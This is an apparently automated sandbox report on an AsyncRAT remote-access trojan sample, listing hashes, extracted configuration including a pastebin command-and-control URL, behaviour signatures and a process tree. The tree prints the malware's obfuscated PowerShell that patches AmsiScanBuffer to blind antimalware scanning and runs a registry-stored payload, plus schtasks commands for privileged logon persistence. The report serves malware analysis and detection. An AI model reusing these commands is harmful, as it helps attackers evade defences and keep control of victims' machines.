Resubmissions

30-10-2024 21:02

241030-zvd7eazlev 10

30-10-2024 19:27

241030-x6eafazemg 10

24-10-2024 22:13

241024-144zvsvhpq 10

Analysis

  • max time kernel
    90s
  • max time network
    92s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-10-2024 22:13

General

  • Target

    15c8cc6c27eab9e8c6e8e01883247ffc4a3907042d747859fff2ce622f9647dc.exe

  • Size

    578KB

  • MD5

    0fc72f5b6c6a6109f6f3c3d43089e422

  • SHA1

    7b05b6c35e5f1c2dd4aa215b4c0289c970b9cdab

  • SHA256

    15c8cc6c27eab9e8c6e8e01883247ffc4a3907042d747859fff2ce622f9647dc

  • SHA512

    fcb4251dd52a6bb04009078c5fe38ce014c50091c09c8b54ba3a1d8b910cdf4c915deb7b91838da53033d7da3602057453d651cdb561acc9d634962e31e2c5e3

  • SSDEEP

    12288:rlMq2L06Z/oQNgZHjow6V3hLfIW2MxcSg4bQ5RtlcrdxYf:ZILJ9olJowwRLAWFDgqzdif

Malware Config

Extracted

Family

asyncrat

Version

true

Botnet

LNjector

Mutex

NglVnt43hRGA

Attributes
  • delay

    3

  • install

    false

  • install_file

    $77oui.exe

  • install_folder

    %StartupStatus%

  • pastebin_config

    https://pastebin.com/raw/e0jEz3T0

aes.plain
aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 20 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{2ced2d4f-4a2b-44ef-884a-a800395ec298}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4500
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:512
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1032
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1052
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1064
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1188
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1196
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2780
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:WWktrehEYULu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nSPadwAbnNTZvk,[Parameter(Position=1)][Type]$RCDZHfTHTa)$lzMWIlrxQyN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+'D'+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'gate'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s,'+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+'c,S'+'e'+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+',A'+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$lzMWIlrxQyN.DefineConstructor('RT'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$nSPadwAbnNTZvk).SetImplementationFlags(''+'R'+'un'+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$lzMWIlrxQyN.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+','+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+'tu'+'a'+''+'l'+'',$RCDZHfTHTa,$nSPadwAbnNTZvk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $lzMWIlrxQyN.CreateType();}$pebUcHAxWihcN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+''+'e'+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n'+'3'+''+'2'+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+''+[Char](102)+''+'e'+'Na'+[Char](116)+''+'i'+''+'v'+''+'e'+'M'+'e'+''+[Char](116)+''+'h'+''+'o'+''+'d'+''+'s'+'');$daEyuAXlVTOMhB=$pebUcHAxWihcN.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+'ocAd'+[Char](100)+''+'r'+'e'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+','+'St'+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$xFRvSnKLOvozWIbqSaT=WWktrehEYULu @([String])([IntPtr]);$EMOWkVQetfemRpNUiukSnt=WWktrehEYULu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TYMJeDkiJqB=$pebUcHAxWihcN.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+'l'+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'ne'+'l'+'32'+[Char](46)+''+'d'+'l'+'l'+'')));$yLfNtlcRxVbxOM=$daEyuAXlVTOMhB.Invoke($Null,@([Object]$TYMJeDkiJqB,[Object]('L'+[Char](111)+''+'a'+''+'d'+'L'+'i'+'b'+[Char](114)+'a'+'r'+''+[Char](121)+'A')));$cBuODVFOfVYRNtIiR=$daEyuAXlVTOMhB.Invoke($Null,@([Object]$TYMJeDkiJqB,[Object](''+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+'t')));$ORHyqgn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yLfNtlcRxVbxOM,$xFRvSnKLOvozWIbqSaT).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+'l'+'l');$nDigeOfbFQtPnjdKu=$daEyuAXlVTOMhB.Invoke($Null,@([Object]$ORHyqgn,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$nciTfMEEQS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cBuODVFOfVYRNtIiR,$EMOWkVQetfemRpNUiukSnt).Invoke($nDigeOfbFQtPnjdKu,[uint32]8,4,[ref]$nciTfMEEQS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nDigeOfbFQtPnjdKu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cBuODVFOfVYRNtIiR,$EMOWkVQetfemRpNUiukSnt).Invoke($nDigeOfbFQtPnjdKu,[uint32]8,0x20,[ref]$nciTfMEEQS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+[Char](84)+''+'W'+''+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+'7'+'7'+''+'s'+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4344
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1272
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1312
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1336
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1456
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2900
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1468
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1476
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1492
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1616
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1692
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1740
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1816
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1828
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1908
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1912
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1976
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:2000
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1544
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2136
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2164
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2280
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2416
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2424
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:2468
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2568
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2600
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2636
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2644
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:2948
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2992
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3196
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:3452
                                                                                • C:\Users\Admin\AppData\Local\Temp\15c8cc6c27eab9e8c6e8e01883247ffc4a3907042d747859fff2ce622f9647dc.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\15c8cc6c27eab9e8c6e8e01883247ffc4a3907042d747859fff2ce622f9647dc.exe"
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3496
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell.exe"
                                                                                    3⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4476
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell.exe"
                                                                                    3⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3640
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "powershell.exe"
                                                                                    3⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4156
                                                                                  • C:\Users\Admin\AppData\Local\Temp\87bf4cc7-2d19-4f17-a861-69d4701bc2dd.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\87bf4cc7-2d19-4f17-a861-69d4701bc2dd.exe"
                                                                                    3⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in System32 directory
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4500
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77oui" /tr '"C:\Windows\SysWOW64\$77oui.exe"' & exit
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4200
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "$77oui" /tr '"C:\Windows\SysWOW64\$77oui.exe"'
                                                                                        5⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:232
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB84.tmp.bat""
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:840
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout 3
                                                                                        5⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:2552
                                                                                      • C:\Windows\SysWOW64\$77oui.exe
                                                                                        "C:\Windows\SysWOW64\$77oui.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5092
                                                                                  • C:\Users\Admin\AppData\Local\Temp\94e0a7f9-2c14-4595-9ac1-213fc6448540.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\94e0a7f9-2c14-4595-9ac1-213fc6448540.exe"
                                                                                    3⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in System32 directory
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1748
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77non" /tr '"C:\Windows\SysWOW64\$77non.exe"' & exit
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1364
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "$77non" /tr '"C:\Windows\SysWOW64\$77non.exe"'
                                                                                        5⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:4788
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB94.tmp.bat""
                                                                                      4⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:832
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout 3
                                                                                        5⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4952
                                                                                      • C:\Windows\SysWOW64\$77non.exe
                                                                                        "C:\Windows\SysWOW64\$77non.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3180
                                                                                  • C:\Users\Admin\AppData\Local\Temp\5fc7b5e7-3f39-4691-a31e-d9c003fcfc3e.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\5fc7b5e7-3f39-4691-a31e-d9c003fcfc3e.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2524
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3460
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3620
                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                    1⤵
                                                                                      PID:3824
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3980
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:4216
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                        1⤵
                                                                                          PID:4916
                                                                                        • C:\Windows\System32\svchost.exe
                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                          1⤵
                                                                                            PID:4636
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                            1⤵
                                                                                              PID:532
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                              1⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:3104
                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                              1⤵
                                                                                                PID:3952
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                1⤵
                                                                                                  PID:4460
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4232
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:1428
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                    1⤵
                                                                                                      PID:3836
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4072
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                        1⤵
                                                                                                          PID:2316
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                          1⤵
                                                                                                            PID:608
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:3508
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:4128
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                1⤵
                                                                                                                  PID:5016
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:1176
                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                  1⤵
                                                                                                                    PID:1568
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                    1⤵
                                                                                                                      PID:2264
                                                                                                                    • C:\Windows\System32\mousocoreworker.exe
                                                                                                                      C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2624
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:1260
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                        1⤵
                                                                                                                          PID:4604
                                                                                                                        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                            PID:4704
                                                                                                                          • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                            1⤵
                                                                                                                              PID:396

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

